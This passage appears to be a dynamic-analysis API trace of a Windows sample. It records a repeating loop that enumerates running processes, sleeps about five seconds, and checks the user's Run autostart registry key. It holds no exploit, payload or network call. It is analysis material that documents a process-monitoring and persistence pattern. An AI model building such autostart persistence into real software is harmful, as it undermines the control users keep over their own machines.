NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.397] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.408] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.408] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.408] NtClose (Handle=0x154) returned 0x0 [0184.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.412] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.424] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.424] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.424] NtClose (Handle=0x154) returned 0x0 [0184.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.428] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.440] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.440] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.440] NtClose (Handle=0x154) returned 0x0 [0184.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.444] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.455] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.455] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.455] NtClose (Handle=0x154) returned 0x0 [0184.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.458] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.470] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.471] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.471] NtClose (Handle=0x154) returned 0x0 [0184.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.487] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.487] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.487] NtClose (Handle=0x154) returned 0x0 [0184.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.491] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.502] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.502] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.502] NtClose (Handle=0x154) returned 0x0 [0184.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.506] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.517] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.517] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.517] NtClose (Handle=0x154) returned 0x0 [0184.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.521] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.533] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.533] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.533] NtClose (Handle=0x154) returned 0x0 [0184.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.537] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.561] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.561] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.561] NtClose (Handle=0x154) returned 0x0 [0184.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.579] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.580] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.580] NtClose (Handle=0x154) returned 0x0 [0184.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.584] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.595] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.595] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.595] NtClose (Handle=0x154) returned 0x0 [0184.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.599] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.613] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.613] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.613] NtClose (Handle=0x154) returned 0x0 [0184.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, 